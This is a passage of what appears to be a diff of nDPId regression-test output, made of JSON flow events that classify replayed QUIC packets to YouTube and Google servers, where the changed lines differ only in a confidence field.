JTldPbPASYuxvZBuOv7vGEJxC\/B7ThuZCvaUXSTwfSYdYePG5WL2Y3bz72m1SZEmn+4Kiqq\/h2MEhMWL2wbVTZ8FAX0VWRfwhSMlOHHKMW3u3baADN0N+mh8BW\/zOcs6XrHPEAtq\/4pbenpQ2rrBUepHw7wEl2Gy7TOdtirMeicrvRMH5ROutCuksQv6EbOTonl2eA9Uzw3fk+NLZelZDt7+chmNI0wDo+\/LKiADiMtDwBrUShAJhuyJCYkzqz3+\/I22nE9z8jtSau8DwJe8rGnUypF+QexVaXFHzHrGc8pEc6Gv1V+yd7O9j1BH6SI99CGYQ4qUSe+Qvf17MPqt6Vv5BD2ZiEf2go7Ms8wrYgSzdW2J6h2lnH8T12duhSfnaN+XilOPE6QCReHpz3pNB7sD3txciXal1Cjtz+D52skW92QHoQ6HQJRVcO1F+Nt9Ms6O4a82MSiFPLyQ4+9HZ8XzRNGIA6bYEMtQ2VoveeK36tJK5jcwcf1bd2KXco4wwhd6yGi79yvfAr9Gnfa+nm9EvT23xLYwd6SLl+UW2Yy\/cUnjlQIjkF+Nl2AFUyHKqbZX2R5uA7ATglq8Z5hVDirutJRbMvjB3S6p209yWJX36GoCAlZULNNq4O\/K9HsfmRuSQzzO8vAnTtDfmAG177+f\/BH\/oOcDleRinaIgIUXyhxOMJNHNbCiUdxlGmVs0Kf\/YtICcdSgbpsnkh7sZqaLRn0qnOt+5wry5o8FjthI8Fu2te\/X8Ye4gIOivJjbZs+RLhZQxZWtt03HV6ev4z867dtIUmron46fcA2edbLbHQ119w4dS3GwaljEI9565fGeAZxLwyqZbVZ07sOBYRGxKVWe9qlVpepdG7mzZWTkGm1aG8jBuv1yWlVaWyIe\/5D3F\/Zn\/LsMgNe+1ozo\/g3Qq8MWGLKjZnwl7\/\/\/D"} -00945{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":43,"source":"quic_frags_ch_out_of_order_same_packet_craziness.pcapng","alias":"nDPId-test","flow_id":32,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1621432545371,"flow_last_seen":1621432545371,"flow_idle_time":200000,"flow_min_l4_payload_len":1350,"flow_max_l4_payload_len":1350,"flow_tot_l4_payload_len":1350,"flow_avg_l4_payload_len":1350,"midstream":0,"thread_ts_msec":1621432545371,"l3_proto":"ip4","src_ip":"168.144.64.5","dst_ip":"9.65.169.252","src_port":60809,"dst_port":443,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"QUIC.YouTube","breed":"Fun","category":"Media"},"quic": {"client_requested_server_name":"suggestqueries-clients6.youtube.com","user_agent":"dev Chrome\/92.0.4503.3 Windows NT 10.0; Win64; x64","version":"TLSv1.3","alpn":"h3-29","ja3":"78ba053b9aa352e84a4eea899207839a","tls_supported_versions":"TLSv1.3"}} 
+00945{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":43,"source":"quic_frags_ch_out_of_order_same_packet_craziness.pcapng","alias":"nDPId-test","flow_id":32,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1621432545371,"flow_last_seen":1621432545371,"flow_idle_time":200000,"flow_min_l4_payload_len":1350,"flow_max_l4_payload_len":1350,"flow_tot_l4_payload_len":1350,"flow_avg_l4_payload_len":1350,"midstream":0,"thread_ts_msec":1621432545371,"l3_proto":"ip4","src_ip":"168.144.64.5","dst_ip":"9.65.169.252","src_port":60809,"dst_port":443,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"QUIC.YouTube","breed":"Fun","category":"Media"},"quic": {"client_requested_server_name":"suggestqueries-clients6.youtube.com","user_agent":"dev Chrome\/92.0.4503.3 Windows NT 10.0; Win64; x64","version":"TLSv1.3","alpn":"h3-29","ja3":"78ba053b9aa352e84a4eea899207839a","tls_supported_versions":"TLSv1.3"}} 00632{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":44,"source":"quic_frags_ch_out_of_order_same_packet_craziness.pcapng","alias":"nDPId-test","flow_id":33,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1621432561767,"flow_last_seen":1621432561767,"flow_idle_time":200000,"flow_min_l4_payload_len":1350,"flow_max_l4_payload_len":1350,"flow_tot_l4_payload_len":1350,"flow_avg_l4_payload_len":1350,"midstream":0,"thread_ts_msec":1621432561767,"l3_proto":"ip4","src_ip":"168.144.64.5","dst_ip":"169.81.163.225","src_port":55637,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 
02308{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":44,"source":"quic_frags_ch_out_of_order_same_packet_craziness.pcapng","alias":"nDPId-test","flow_id":33,"flow_packet_id":1,"flow_last_seen":1621432561767,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":1392,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":1392,"pkt_l4_len":1358,"thread_ts_msec":1621432561767,"pkt":"AAAAAAAAAAEA737VCABFAAViWJxAAH4RaSaokEAFqVGj4dlVAbsFTh0rwv8AAB0IWitP07hFwPIAAEU0OQ8EdQTKeE\/y3KmcSMkX+qEOqn52RlGrldbICsY\/S34wZNRn+08waAiGjsEVTtahcIPi35YuHK8wq0g59jo9OBg4akM\/IBMGR7R84CJBN461mppY8jQVuZTPgmTRdB2IYpULPqPfoX1v+i9gHbqu5NK3OwzMLconK6EyplQxCPNt5Hf30K95kk3qNJtwkSisClc72nLsoaYauap5qms4Uf\/J91\/kVmZMeIlYa1jjcfZ3z0VI9gHepy0CkQxYfepscIvVGFIBRny+Rr6Mo5Wdi6EIb\/T5QSBed45QkLsJA9gUQEq7M7LKJgg+IKLvJoW43JTt7tWUALAA7xqNg8ZMlYbspeUjoDBFwmTYyCGMZ5bdPdJsCKJjP1zB6Ihkj9HzcCVcVpCt5y5VRUWbI3s+SuMDcnwmhOo2Cnlr0DZfIFBqUld4Y4RY5VqVdeJo7oFXW7AwYc+nzTUTjYB7sFAHoCxtg3W+GcMFoxOtPlRytxdZ5wbadwjKEwqJuIJpIaPT9Hl5ErVl3zaNl7AbKrrPwnZr1V\/c2RNnNxvqBfO2+OD+glALVErSZ8Wgf5WaLzvHB8WMIbmug\/NFM\/SLKtJ\/BaWEqzeoVef0rMzIe7N3WaGlp54AM2gUWArP3379QDPnly3sySsTiCLjmgz\/a\/YAV8iH0MWGhxoXL8uO+18tMZKic96P3qCeZ8y7LR8W+ULC4hM7PW26ZmpzKFTv+x+dXax\/FbNTBDPTQMmIlCH9iOw143\/ImSuF0s3s4JVp4Qr6CGbUM7wVRHYWtzpVhyLQMg81Qv2OEiCnOjzFFBbzp\/0bJKOqHRD4Q\/MvBarEfeFcKiSbAbTSNM8PQgQqkr0ZRwugcr2Ffp+Gn+l7xOOzT42OiObWh\/q5Vz8yxCjvr\/A3rCWwstbOOV346nm7SzYmCeDdLhhv6lnhMiAKqzz9Y+7ejwsae5M2M3swKabBXR4s56U0TQF+O7sfltB20eE597p4k5i6pwoHpILiBDttMLzjO7dc91E1IYlMz1tAgL+S9RvKr72GqDN6ZnJlEhDdKvlV5HT1Hkn9kqkuTTOQ0XHul3D3GFcWCqjADIqlVTcjrCO73smKB0a4uTZQbOIpVVIdV6+6r6fVzLgJO5GsuxJaHTgytCf3she4LLg13wNSfnN1MfvyZUdUQE3f3vPJyjzsirq8bCev5LQkUR9nijtvOuY+AYdDoq9V3BpiAPC\/5krfJFIpYwodSbeepb3MzG81QlFd2eB1ghaJpx0Lkod5SIZJSovz09xRaU2rOvyKR8WRRif52MUKIukeKGfbFHZtrKxCIiJ0BDLx\/i+Ol15n6ZZ7Ufce2YGrldvNoQcB39pF13M2xxh0ga17XgFyOLwQChgB\/CIi0XzrAp5k8ZwTJaYDryhvEy+QLvWWBRLc0grxIicpNZZajbTUE+i952VB6IrVqmtuYgLUVGpF7YVtpu59m6nPy+7bYq81ByF
XlwxoThbET2t5Xwh4tKj2kEGlA4a\/A2nbUyPihPkju\/hgap4rdGkxuysnOZqlWiIRDL9NAexX29gx1xqsSqsDeI+D4cJhsXJ2P5ihR\/sHA3rpBQJRT+rRYmYWzUeoZmXY\/d+n2pZTXUwAQIcY2gZ61ZU3fymYydiwOlVXMdRNyaSlDGExGzYNiSdgFAynC4TF209BUTK\/I6hsurJHhtkEW4PNMZmrFy1b37DXFZ2+N3Li+vjPgOwB0NUwzN9CtFWQGGZdoOh+DGOlpM73XGxkM8fpT6xsMV7tcylekSF9KrwkYBnC"} -00944{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":44,"source":"quic_frags_ch_out_of_order_same_packet_craziness.pcapng","alias":"nDPId-test","flow_id":33,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1621432561767,"flow_last_seen":1621432561767,"flow_idle_time":200000,"flow_min_l4_payload_len":1350,"flow_max_l4_payload_len":1350,"flow_tot_l4_payload_len":1350,"flow_avg_l4_payload_len":1350,"midstream":0,"thread_ts_msec":1621432561767,"l3_proto":"ip4","src_ip":"168.144.64.5","dst_ip":"169.81.163.225","src_port":55637,"dst_port":443,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"QUIC.YouTube","breed":"Fun","category":"Media"},"quic": {"client_requested_server_name":"r3---sn-hju7enel.googlevideo.com","user_agent":"dev Chrome\/92.0.4503.3 Windows NT 10.0; Win64; x64","version":"TLSv1.3","alpn":"h3-29","ja3":"8b979b020e67a82c4f1f7f3932805dbb","tls_supported_versions":"TLSv1.3"}} +00944{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":44,"source":"quic_frags_ch_out_of_order_same_packet_craziness.pcapng","alias":"nDPId-test","flow_id":33,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1621432561767,"flow_last_seen":1621432561767,"flow_idle_time":200000,"flow_min_l4_payload_len":1350,"flow_max_l4_payload_len":1350,"flow_tot_l4_payload_len":1350,"flow_avg_l4_payload_len":1350,"midstream":0,"thread_ts_msec":1621432561767,"l3_proto":"ip4","src_ip":"168.144.64.5","dst_ip":"169.81.163.225","src_port":55637,"dst_port":443,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"QUIC.YouTube","breed":"Fun","category":"Media"},"quic": 
{"client_requested_server_name":"r3---sn-hju7enel.googlevideo.com","user_agent":"dev Chrome\/92.0.4503.3 Windows NT 10.0; Win64; x64","version":"TLSv1.3","alpn":"h3-29","ja3":"8b979b020e67a82c4f1f7f3932805dbb","tls_supported_versions":"TLSv1.3"}} 00633{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":45,"source":"quic_frags_ch_out_of_order_same_packet_craziness.pcapng","alias":"nDPId-test","flow_id":34,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1621432687153,"flow_last_seen":1621432687153,"flow_idle_time":200000,"flow_min_l4_payload_len":1350,"flow_max_l4_payload_len":1350,"flow_tot_l4_payload_len":1350,"flow_avg_l4_payload_len":1350,"midstream":0,"thread_ts_msec":1621432687153,"l3_proto":"ip4","src_ip":"168.144.64.5","dst_ip":"113.250.137.243","src_port":53127,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 02314{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":45,"source":"quic_frags_ch_out_of_order_same_packet_craziness.pcapng","alias":"nDPId-test","flow_id":34,"flow_packet_id":1,"flow_last_seen":1621432687153,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":1392,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":1392,"pkt_l4_len":1358,"thread_ts_msec":1621432687153,"pkt":"AAAAAAAAAAEAWIVLCABFAAVi+xVAAH4RF\/KokEAFcfqJ88+HAbsFTkZ0zv8AAB0IUFF8ZbsplgcANwA8pfqGZZe+H8YbVevtEq0uW3yOyXta0h88u9QuYUdq8LE0sDqOmyGjxvU7MaDIbVqplgETW\/NE\/cvaMSDgL9CHXru0efaH26aRrBGKK\/el8kZH3UaZy\/b9fmgdZ9mmXS5myo5Uucklk32jY0nKiPx7OwGdOw\/13D\/yhjhsJPO9lxfnt\/xrx5w2VANECESU2NEWkJRxhIc\/dJshO3z01DVcn1fIfmiyloSgZUd+\/HKai9If5RANhfzeQXioPpPbOoecz6if3Z3FtQKFLotx+aOWuKKAGGc0cyrUXi77xeLDAxjE6tOM9yaGQcFFgEY\/SOBwtvWDdb9NoQWO7p11EUZ+wl\/rZ5GXlvPXsY8mh6Clgitpg7R24nHSXQN0B06887mB4HnoNDeAmXGTVqNUO5Hwpt4Nv5fOd\/uAYlaCVVGeZWnQSUt3FSt6UlJWCYhZFk40gfKSsTtWeOQIhnNtUP5+zwa3UUHni3XmISHlQzbBz\/bS0jB08K8r4MbQ1k++PfwYjBxXo33Ojv377xL3kEWdt7dqkANX+xOLqZ4hYjJtVeJE6KaWK5kxNrvgI4+Wbq72iTCPnuWu4Yc+04d7b
\/zeICLVlQ4UJomN5dkhXIvTFKQ7NG0K7rxpiRWOcSPWgsWX4wFJhAUCcqoK9wfw0ZMIl8zrsdDk5l5X+x8MTT+SQICOrIXn0ZSpTbD3Xt68fdgFWkqOjWnFQHPy3Iy3RczgAeN7wIYFfuCnnC6ME+5Pu63Pk2iPfP7TzEvCq+iYnwhXaGT1sDWUzQDz9Ea\/yyYCqRPN\/gqIRL+pXgs9ex+9iKQaMTnc0vlqASRWWCZPNc2rf\/Q9eHHk4W3NPoX3ez56VofMyV9x8Kx7xSgFDFLRY80kBMgLWMJDfi6woBPhXKsM4wd2mLvh7\/wW+nGUcZMc5X3DVUUiDmGzvF7qBR8QzheMOnqAvFyKMGSpJJ5Ps0oPIRQEBEONuBTdMtasa9lBz6DGcqXqeY1rs9cdoTZaeh1CgiDqdZdsgdaBb3PTBxELCiZg3Mjn2Ot0f4S6rODt1khthCXa+j8H7di6Uu0LktCHPUKJullar39r7GXB33cmiLI1UYXrrTv25S4DhWZdTftmpBXDFOwlNLMeatZGrEKK7zLzeIx5rioedbNSfdLfUi9tYWh0gPPFQENtKlJVn1Gyol7zm\/QqNOvgomZt6RUw\/PI2OFl+9zsCQmj6uTnByKe6c\/tZrUT6N2R5lvUzAGZIClGGsFR4e4cmvkmiIdEOo+lEW9ZEBcUKvujsGgkc9cAkZMsNkFQc\/PgQpvfYqWlnRu5wnZk6Sv5jPr2LTnEt\/ndr7UGSNAG3nto3fdM2CWZImFEJlzxZcJ6Pjr\/DX1+sbuL0VJWf56xETi07cgoGnD9splJhqvifjBi5hE6IKs1smgIDugqMeU+hKZgmx0tlIBEDohI\/weDtB6ZoTNVzeCrtE9Ne5sHna3EbB6mrF1wOyF+v7JqhFt1AklERk8cvtUnrNY9KDllJiAIoy8SJ+lKPlC22sDEHqftvcIo8mS2cppG0wllO2Q1TclT9pjsn1nIhooutFD14OqIrVo62MaGWaUpxzW8sZy1SVksc06sGqCdoo8s5qQi7Gz1K7yZhZo6W82as73l\/bfhqszTmMajohCA0Y9MFT\/+c5ticaJcK8VZzHx\/4ndP6BdrrmvIMXm4MvPY0XbZvr4Jyhd\/FOn6vdTJUGitV6mUWBc8Qn4h5NGpTVY3jRUrKJ\/3UHMEn9NXaFjwDa+i\/lDWeXt3KF5YT"} -00930{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":45,"source":"quic_frags_ch_out_of_order_same_packet_craziness.pcapng","alias":"nDPId-test","flow_id":34,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1621432687153,"flow_last_seen":1621432687153,"flow_idle_time":200000,"flow_min_l4_payload_len":1350,"flow_max_l4_payload_len":1350,"flow_tot_l4_payload_len":1350,"flow_avg_l4_payload_len":1350,"midstream":0,"thread_ts_msec":1621432687153,"l3_proto":"ip4","src_ip":"168.144.64.5","dst_ip":"113.250.137.243","src_port":53127,"dst_port":443,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"QUIC.Google","breed":"Acceptable","category":"Cloud"},"quic": {"client_requested_server_name":"b1.nel.goog","user_agent":"dev Chrome\/92.0.4503.3 
Windows NT 10.0; Win64; x64","version":"TLSv1.3","alpn":"h3-29","ja3":"78ba053b9aa352e84a4eea899207839a","tls_supported_versions":"TLSv1.3"}} -00728{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":46,"source":"quic_frags_ch_out_of_order_same_packet_craziness.pcapng","alias":"nDPId-test","flow_id":29,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1621432429509,"flow_last_seen":1621432429509,"flow_idle_time":200000,"flow_min_l4_payload_len":1350,"flow_max_l4_payload_len":1350,"flow_tot_l4_payload_len":1350,"flow_avg_l4_payload_len":1350,"midstream":0,"thread_ts_msec":1621432687153,"l3_proto":"ip4","src_ip":"168.144.64.5","dst_ip":"220.80.126.73","src_port":64976,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"QUIC.YouTube","breed":"Fun","category":"Media"}} -00742{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":46,"source":"quic_frags_ch_out_of_order_same_packet_craziness.pcapng","alias":"nDPId-test","flow_id":30,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1621432440134,"flow_last_seen":1621432440134,"flow_idle_time":200000,"flow_min_l4_payload_len":1350,"flow_max_l4_payload_len":1350,"flow_tot_l4_payload_len":1350,"flow_avg_l4_payload_len":1350,"midstream":0,"thread_ts_msec":1621432687153,"l3_proto":"ip4","src_ip":"168.144.64.5","dst_ip":"35.194.157.47","src_port":61209,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"QUIC.Google","breed":"Acceptable","category":"Advertisement"}} 
-00727{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":46,"source":"quic_frags_ch_out_of_order_same_packet_craziness.pcapng","alias":"nDPId-test","flow_id":31,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1621432489421,"flow_last_seen":1621432489421,"flow_idle_time":200000,"flow_min_l4_payload_len":1350,"flow_max_l4_payload_len":1350,"flow_tot_l4_payload_len":1350,"flow_avg_l4_payload_len":1350,"midstream":0,"thread_ts_msec":1621432687153,"l3_proto":"ip4","src_ip":"168.144.64.5","dst_ip":"99.45.60.254","src_port":50540,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"QUIC.YouTube","breed":"Fun","category":"Media"}} +00930{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":45,"source":"quic_frags_ch_out_of_order_same_packet_craziness.pcapng","alias":"nDPId-test","flow_id":34,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1621432687153,"flow_last_seen":1621432687153,"flow_idle_time":200000,"flow_min_l4_payload_len":1350,"flow_max_l4_payload_len":1350,"flow_tot_l4_payload_len":1350,"flow_avg_l4_payload_len":1350,"midstream":0,"thread_ts_msec":1621432687153,"l3_proto":"ip4","src_ip":"168.144.64.5","dst_ip":"113.250.137.243","src_port":53127,"dst_port":443,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"QUIC.Google","breed":"Acceptable","category":"Cloud"},"quic": {"client_requested_server_name":"b1.nel.goog","user_agent":"dev Chrome\/92.0.4503.3 Windows NT 10.0; Win64; x64","version":"TLSv1.3","alpn":"h3-29","ja3":"78ba053b9aa352e84a4eea899207839a","tls_supported_versions":"TLSv1.3"}} 
+00728{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":46,"source":"quic_frags_ch_out_of_order_same_packet_craziness.pcapng","alias":"nDPId-test","flow_id":29,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1621432429509,"flow_last_seen":1621432429509,"flow_idle_time":200000,"flow_min_l4_payload_len":1350,"flow_max_l4_payload_len":1350,"flow_tot_l4_payload_len":1350,"flow_avg_l4_payload_len":1350,"midstream":0,"thread_ts_msec":1621432687153,"l3_proto":"ip4","src_ip":"168.144.64.5","dst_ip":"220.80.126.73","src_port":64976,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"QUIC.YouTube","breed":"Fun","category":"Media"}} +00742{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":46,"source":"quic_frags_ch_out_of_order_same_packet_craziness.pcapng","alias":"nDPId-test","flow_id":30,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1621432440134,"flow_last_seen":1621432440134,"flow_idle_time":200000,"flow_min_l4_payload_len":1350,"flow_max_l4_payload_len":1350,"flow_tot_l4_payload_len":1350,"flow_avg_l4_payload_len":1350,"midstream":0,"thread_ts_msec":1621432687153,"l3_proto":"ip4","src_ip":"168.144.64.5","dst_ip":"35.194.157.47","src_port":61209,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"QUIC.Google","breed":"Acceptable","category":"Advertisement"}} 
+00727{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":46,"source":"quic_frags_ch_out_of_order_same_packet_craziness.pcapng","alias":"nDPId-test","flow_id":31,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1621432489421,"flow_last_seen":1621432489421,"flow_idle_time":200000,"flow_min_l4_payload_len":1350,"flow_max_l4_payload_len":1350,"flow_tot_l4_payload_len":1350,"flow_avg_l4_payload_len":1350,"midstream":0,"thread_ts_msec":1621432687153,"l3_proto":"ip4","src_ip":"168.144.64.5","dst_ip":"99.45.60.254","src_port":50540,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"QUIC.YouTube","breed":"Fun","category":"Media"}} 00632{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":46,"source":"quic_frags_ch_out_of_order_same_packet_craziness.pcapng","alias":"nDPId-test","flow_id":35,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1621432793457,"flow_last_seen":1621432793457,"flow_idle_time":200000,"flow_min_l4_payload_len":1350,"flow_max_l4_payload_len":1350,"flow_tot_l4_payload_len":1350,"flow_avg_l4_payload_len":1350,"midstream":0,"thread_ts_msec":1621432793457,"l3_proto":"ip4","src_ip":"168.144.64.5","dst_ip":"152.128.87.238","src_port":50073,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 
02312{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":46,"source":"quic_frags_ch_out_of_order_same_packet_craziness.pcapng","alias":"nDPId-test","flow_id":35,"flow_packet_id":1,"flow_last_seen":1621432793457,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":1392,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":1392,"pkt_l4_len":1358,"thread_ts_msec":1621432793457,"pkt":"AAAAAAAAAAEAgb5NCABFAAVi1J5AAH4RSeiokEAFmIBX7sOZAbsFTp9JxP8AAB0I7Hz6xe0rqSIANwDXZeiBOis1quzsT\/obGG0x+3XLqfDbWYiwJuWBqOtEfIn\/ZPOFbr4OpvKQaBk8YcaDhmjs8G9E\/bYLKxuZyad2DEvamcZFVtntEFziXhXn3+pQrDq\/AMQ6LmeqWyyt9eA3XDKtJ4xY1Bc6e9UD8t6D7Sgm5IQhV9SFnw3BxVaQkrl6hR\/dDVS5UMps0rHJiqJfxJX9XuDk7Hfp1cVZA24xlVPWJVRY2UAeIc2Zve2M7H6lmFiRWRA5qAccgPetxVIxOWgKJZ9rY8EXMEmXdS70H4KMbgsfK9Uk6fu\/osiRJWk7Bzz5wQrxWL6dXRJrXxAa2jPXQHVxa7bP8D1pdmGboyWwgZYxklQYJNVQxDA\/GDYY6fvGJ263gPtNp9NnfpJaf3BoWuUPhFP8HvGyQZuIQF1wb9fZXWZ3QHFoIdW68Pqhjnp6kLZ063TmjYYZ4slUYelhsLCLrNb\/dwHKwXnK6PjPM5zy5oxTVIu9HQIZmJtKxSSYJD+ceykV8\/K7hgP3LMhoq\/OjNgE2xqsoCuttGgVjAKWqToZ2SAfQBRXiQmcgW52dCG7Z5HhuDaq\/hB4oOHiiK4\/S0BBNT5M+Pb8ByPul+j0MGVAtYn6fTilvMPrguU47PCHZjjk0z9Wnk26G01zXhhAY0ar4RNDDEzDjmKfqXKVxSDUlPPUIWjq1afjceK2zb3JDwK58fh96mr6zd+glDvfAbQkGN5MH6eMa\/9wzaGAa3ufoLka8Lxli3yUdMj\/VZs9FXs\/jqxxOPuE\/dCtF2asx1eqF6Dv896U\/rfqEfRamU8Y4w+RgEO1CTD7sshtD1igsz3xv7fwlgvoMBlSMrIYm2kXO5Mm4rUbFhOvxSUXvhCAz80phe1BldOJ\/juAj8qGCoV+gQOWqnuDFHTVXEB73DtcArIBGJd9D++3m82t+emgLBdig+H7CGHczwalju210OQ3B+NgGpSSFA2TExawDMw2BskyWcMWOAJB+1YPrBoF06DgneuWy+G1EzSXWEKGoBP9Hvvi3iiO3IcHdBaysDd3G163RjNVGtjxLv3H2wGiF8W8BtUy8x\/4x0t8GKV8DeHoRZAPR1VW9jsM9BHk3UFKs6e+5DG41zNnmrJMvsQCLdE7Mc8w4ELvM4HhyshxInLs7aAqATi\/cJpkJVFPEVzRSH2iJPYmG8HdHW+MR+R4aifCxPvUJqcMbXFiSZcU+MJ70p7YnFW\/gfvm4Ux4DbVMAkNpUImzqnQsubAKj0w\/8ulR5Wetc3zilx2pLq7DZxLdXVFjLXuRQmY2yCeGisGB5PUkdsGOp1IyO0idKFB6vegqD53wg8CaYEO5x0Hmz4Pk70XwPcVkukm1ulZSYY\/nmgbz541r2QMShd26Vqrvyg\/J8rOTVuiAbPswYJnJk0xDz7XloJ2aoIPRONK5nlUihp2bOw9Nuxf36SB6k0LSj\/s4mNxG1QNaEf5XxQTpLl1PynNm
mtwiukSv5w+u6Dh3MmLJERlHtMy3fg6A3dZn2rVplpcATmPl3e6JcqSXfEQHaMUL9vqZgy\/h073US6J03VMt+\/bO+qzfltNYykBXZikfo2Jeay4vIVade7edcMHLP0kMMz8YzuMkFj5mSEOozDdFrwgdubKvf0WUvGC9sG0GJQuA6K0zS0AdH6\/IDWTjjKCqm0CNfUV3pEg1fuSIaLXiC27HEebsSGbBEc86cnhXJ6xcni7lN18XwT\/wRTUuZ4kfbyFf\/WQSlRJNS7ifRduPwfHvUgAkTi6eqDziLvnVkJ6BbPbv+fYGh"} -00948{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":46,"source":"quic_frags_ch_out_of_order_same_packet_craziness.pcapng","alias":"nDPId-test","flow_id":35,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1621432793457,"flow_last_seen":1621432793457,"flow_idle_time":200000,"flow_min_l4_payload_len":1350,"flow_max_l4_payload_len":1350,"flow_tot_l4_payload_len":1350,"flow_avg_l4_payload_len":1350,"midstream":0,"thread_ts_msec":1621432793457,"l3_proto":"ip4","src_ip":"168.144.64.5","dst_ip":"152.128.87.238","src_port":50073,"dst_port":443,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"QUIC.YouTube","breed":"Fun","category":"Media"},"quic": {"client_requested_server_name":"r3---sn-vh5ouxa-hjud.googlevideo.com","user_agent":"dev Chrome\/92.0.4503.3 Windows NT 10.0; Win64; x64","version":"TLSv1.3","alpn":"h3-29","ja3":"78ba053b9aa352e84a4eea899207839a","tls_supported_versions":"TLSv1.3"}} -00727{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":47,"source":"quic_frags_ch_out_of_order_same_packet_craziness.pcapng","alias":"nDPId-test","flow_id":32,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1621432545371,"flow_last_seen":1621432545371,"flow_idle_time":200000,"flow_min_l4_payload_len":1350,"flow_max_l4_payload_len":1350,"flow_tot_l4_payload_len":1350,"flow_avg_l4_payload_len":1350,"midstream":0,"thread_ts_msec":1621432793457,"l3_proto":"ip4","src_ip":"168.144.64.5","dst_ip":"9.65.169.252","src_port":60809,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": 
{"4":"DPI"},"proto":"QUIC.YouTube","breed":"Fun","category":"Media"}} -00729{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":47,"source":"quic_frags_ch_out_of_order_same_packet_craziness.pcapng","alias":"nDPId-test","flow_id":33,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1621432561767,"flow_last_seen":1621432561767,"flow_idle_time":200000,"flow_min_l4_payload_len":1350,"flow_max_l4_payload_len":1350,"flow_tot_l4_payload_len":1350,"flow_avg_l4_payload_len":1350,"midstream":0,"thread_ts_msec":1621432793457,"l3_proto":"ip4","src_ip":"168.144.64.5","dst_ip":"169.81.163.225","src_port":55637,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"QUIC.YouTube","breed":"Fun","category":"Media"}} 